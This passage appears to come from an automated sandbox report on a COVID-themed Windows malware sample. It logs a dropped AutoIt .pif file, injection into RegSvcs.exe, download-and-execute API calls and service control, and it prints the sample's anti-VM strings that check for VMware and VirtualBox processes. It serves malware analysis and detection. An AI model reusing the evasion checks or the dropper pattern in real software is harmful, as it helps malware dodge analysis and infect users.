                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4E336 push ecx; ret 0_2_00C4E349
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4D870 push eax; ret 0_2_00C4D88E
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_01306BD5 push ecx; ret 4_2_01306BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013C3ED0 push eax; ret 6_2_013C3EFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B13ED0 push eax; ret 12_2_00B13EFE
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_0130FFBC LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0130FFBC
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeFile created: C:\84086963\__tmp_rar_sfx_access_check_4095843Jump to behavior

                Persistence and Installation Behavior:

                barindex
                Drops PE files with a suspicious file extensionShow sources
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeFile created: C:\84086963\xdhqeufpq.pifJump to dropped file
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeFile created: C:\84086963\xdhqeufpq.pifJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013BD4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,6_2_013BD4E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013C1700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,6_2_013C1700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B9908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_013B9908
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\84086963\xdhqeufpq.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\84086963\xdhqeufpq.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\84086963\xdhqeufpq.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\84086963\xdhqeufpq.pifProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion:

                barindex
                Yara detected AntiVM autoit scriptShow sources
                Source: Yara matchFile source: Process Memory Space: xdhqeufpq.pif PID: 6624, type: MEMORYSTR
                Source: C:\84086963\xdhqeufpq.pif TID: 6628Thread sleep count: 5571 > 30Jump to behavior
                Source: C:\84086963\xdhqeufpq.pif TID: 6628Thread sleep time: -55710s >= -30000sJump to behavior
                Source: C:\84086963\xdhqeufpq.pif TID: 6628Thread sleep count: 120 > 30Jump to behavior
                Source: C:\84086963\xdhqeufpq.pif TID: 6996Thread sleep count: 4703 > 30Jump to behavior
                Source: C:\84086963\xdhqeufpq.pif TID: 6996Thread sleep time: -47030s >= -30000sJump to behavior
                Source: C:\84086963\xdhqeufpq.pif TID: 6996Thread sleep count: 120 > 30Jump to behavior
                Source: C:\84086963\xdhqeufpq.pifThread sleep count: Count: 5571 delay: -10Jump to behavior
                Source: C:\84086963\xdhqeufpq.pifThread sleep count: Count: 4703 delay: -10Jump to behavior
                Source: C:\84086963\xdhqeufpq.pifLast function: Thread delayed
                Source: C:\84086963\xdhqeufpq.pifLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                Source: C:\84086963\xdhqeufpq.pifLast function: Thread delayed
                Source: C:\84086963\xdhqeufpq.pifLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,6_2_013C13C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00B113C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B5156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 013B517Bh6_2_013B5156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B5156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 013B517Bh6_2_013B5156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B05156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 00B0517Bh12_2_00B05156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B05156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 00B0517Bh12_2_00B05156
                Source: C:\84086963\xdhqeufpq.pifWindow / User API: threadDelayed 5571Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 581Jump to behavior
                Source: C:\84086963\xdhqeufpq.pifWindow / User API: threadDelayed 4703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B3C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha6_2_013B3C4A
                Source: xdhqeufpq.pif, 00000004.00000002.615779785.00000000047F0000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") ThenK3
                Source: xdhqeufpq.pif, 00000004.00000002.615779785.00000000047F0000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
                Source: xdhqeufpq.pif, 00000004.00000002.615779785.00000000047F0000.00000004.00000001.sdmpBinary or memory string: VMwaretray.exex
                Source: xdhqeufpq.pif, 00000004.00000002.615779785.00000000047F0000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then:b%D\
                Source: fqficjon.emu.0.drBinary or memory string: If ProcessExists("VboxService.exe") Then
                Source: xdhqeufpq.pif, 00000004.00000002.615779785.00000000047F0000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") ThenaZB
                Source: xdhqeufpq.pif, 00000004.00000002.615779785.00000000047F0000.00000004.00000001.sdmpBinary or memory string: VMwareService.exe
                Source: fqficjon.emu.0.drBinary or memory string: If ProcessExists("VMwaretray.exe") Then
                Source: fqficjon.emu.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                Source: xdhqeufpq.pif, 00000004.00000002.615779785.00000000047F0000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exe'
                Source: xdhqeufpq.pif, 00000004.00000002.615779785.00000000047F0000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then
                Source: xdhqeufpq.pif, 00000004.00000002.615779785.00000000047F0000.00000004.00000001.sdmpBinary or memory string: VboxService.exe1
                Source: xdhqeufpq.pif, 00000004.00000002.615779785.00000000047F0000.00000004.00000001.sdmpBinary or memory string: VBoxTray.exe
                Source: fqficjon.emu.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                Source: fqficjon.emu.0.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: C:\84086963\xdhqeufpq.pifProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4D353 VirtualQuery,GetSystemInfo,0_2_00C4D353
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C3A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00C3A2DF
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C59FD3 FindFirstFileExA,0_2_00C59FD3
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00C4AFB9
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_0132399B GetFileAttributesW,FindFirstFileW,FindClose,4_2_0132399B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,6_2_013B751B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013C0586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,D3DKMTWaitForSynchronizationObjectFromGpu,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NA